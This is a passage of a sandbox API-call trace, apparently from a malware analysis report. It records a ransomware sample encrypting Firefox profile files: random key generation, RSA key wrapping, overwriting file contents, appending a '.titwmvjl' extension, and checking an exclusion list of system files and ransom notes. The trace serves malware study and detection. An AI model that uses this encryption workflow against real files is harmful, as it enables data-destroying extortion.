[0083.930] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.930] GetLastError () returned 0x0 [0083.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.931] CryptDestroyKey (hKey=0x503938) returned 1 [0083.931] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.931] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.931] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.931] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.934] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5037b8) returned 1 [0083.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.934] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.934] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.934] GetLastError () returned 0x0 [0083.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.934] CryptDestroyKey (hKey=0x5037b8) returned 1 [0083.934] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.935] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.935] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.935] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.935] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x62cf, lpOverlapped=0x0) returned 1 [0083.956] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffff9d31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.956] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x62cf, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x62cf, lpOverlapped=0x0) returned 1 [0083.958] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.958] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0083.960] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.964] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.964] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.964] CloseHandle (hObject=0x2d4) returned 1 [0083.965] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\search.json.mozlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\search.json.mozlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\search.json.mozlz4.titwmvjl"), dwFlags=0x1) returned 1 [0083.965] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.965] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.966] lstrcmpW (lpString1="secmod.db", lpString2=".") returned 1 [0083.966] lstrcmpW (lpString1="secmod.db", lpString2="..") returned 1 [0083.966] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="secmod.db" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db" [0083.966] lstrlenW (lpString=".titwmvjl") returned 9 [0083.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.966] VirtualAlloc (lpAddress=0x0, dwSize=0xf2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.966] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db.titwmvjl") returned 98 [0083.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.966] lstrlenW (lpString=".db") returned 3 [0083.966] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.966] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".db ") returned 4 [0083.966] lstrcmpiW (lpString1=".db", lpString2=".titwmvjl") returned -1 [0083.966] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.966] lstrcmpiW (lpString1="secmod.db", lpString2="desktop.ini") returned 1 [0083.966] lstrcmpiW (lpString1="secmod.db", lpString2="autorun.inf") returned 1 [0083.966] lstrcmpiW (lpString1="secmod.db", lpString2="ntuser.dat") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="iconcache.db") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="bootsect.bak") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="boot.ini") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="ntuser.dat.log") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="thumbs.db") returned -1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="KRAB-DECRYPT.html") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="CRAB-DECRYPT.html") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="ntldr") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="NTDETECT.COM") returned 1 [0083.967] lstrcmpiW (lpString1="secmod.db", lpString2="Bootfont.bin") returned 1 [0083.967] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db") returned 89 [0083.967] lstrlenW (lpString=".db") returned 3 [0083.967] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.967] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".db ") returned 4 [0083.967] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.967] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.968] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0083.968] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.969] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0083.970] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.970] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.973] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.973] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.973] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.973] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0083.973] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.973] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.973] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.974] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.977] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.977] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.977] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.977] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.977] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.977] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.978] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.981] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0083.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.981] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.981] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.982] GetLastError () returned 0x0 [0083.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.982] CryptDestroyKey (hKey=0x503938) returned 1 [0083.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.982] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.982] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.986] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0083.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.986] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.986] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.987] GetLastError () returned 0x0 [0083.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.987] CryptDestroyKey (hKey=0x503938) returned 1 [0083.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.987] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.987] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.987] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.988] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x4000, lpOverlapped=0x0) returned 1 [0084.004] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffc000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.005] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x4000, lpOverlapped=0x0) returned 1 [0084.021] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.021] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0084.023] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.028] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.028] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.029] CloseHandle (hObject=0x2d4) returned 1 [0084.029] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\secmod.db"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\secmod.db.titwmvjl"), dwFlags=0x1) returned 1 [0084.030] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.030] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0084.030] lstrcmpW (lpString1="SecurityPreloadState.txt", lpString2=".") returned 1 [0084.030] lstrcmpW (lpString1="SecurityPreloadState.txt", lpString2="..") returned 1 [0084.030] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="SecurityPreloadState.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt" [0084.030] lstrlenW (lpString=".titwmvjl") returned 9 [0084.030] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned 104 [0084.031] VirtualAlloc (lpAddress=0x0, dwSize=0x110, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.031] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt.titwmvjl") returned 113 [0084.031] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned 104 [0084.031] lstrlenW (lpString=".txt") returned 4 [0084.031] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.031] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.031] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.031] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.031] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned 104 [0084.031] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\SecurityPreloadState.txt") returned 104 [0084.031] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="desktop.ini") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="autorun.inf") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ntuser.dat") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="iconcache.db") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="bootsect.bak") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="boot.ini") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ntuser.dat.log") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="thumbs.db") returned -1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="CRAB-DECRYPT.html") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ntldr") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="NTDETECT.COM") returned 1 [0084.032] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="Bootfont.bin") returned 1 [0084.032] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.032] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0084.032] lstrcmpW (lpString1="sessionCheckpoints.json", lpString2=".") returned 1 [0084.032] lstrcmpW (lpString1="sessionCheckpoints.json", lpString2="..") returned 1 [0084.032] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="sessionCheckpoints.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json" [0084.032] lstrlenW (lpString=".titwmvjl") returned 9 [0084.032] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0084.032] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.033] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json.titwmvjl") returned 112 [0084.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0084.033] lstrlenW (lpString=".json") returned 5 [0084.033] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.033] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".json ") returned 6 [0084.033] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0084.033] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0084.033] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0084.033] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="desktop.ini") returned 1 [0084.033] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="autorun.inf") returned 1 [0084.033] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ntuser.dat") returned 1 [0084.033] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="iconcache.db") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="bootsect.bak") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="boot.ini") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ntuser.dat.log") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="thumbs.db") returned -1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="KRAB-DECRYPT.html") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="CRAB-DECRYPT.html") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ntldr") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="NTDETECT.COM") returned 1 [0084.034] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="Bootfont.bin") returned 1 [0084.034] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json") returned 103 [0084.034] lstrlenW (lpString=".json") returned 5 [0084.034] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.034] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".json ") returned 6 [0084.034] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.035] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.035] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionCheckpoints.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessioncheckpoints.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0084.035] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0084.036] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.036] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0084.039] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.040] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.040] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.040] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0084.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.040] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.040] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.040] CryptAcquireContextW (in: 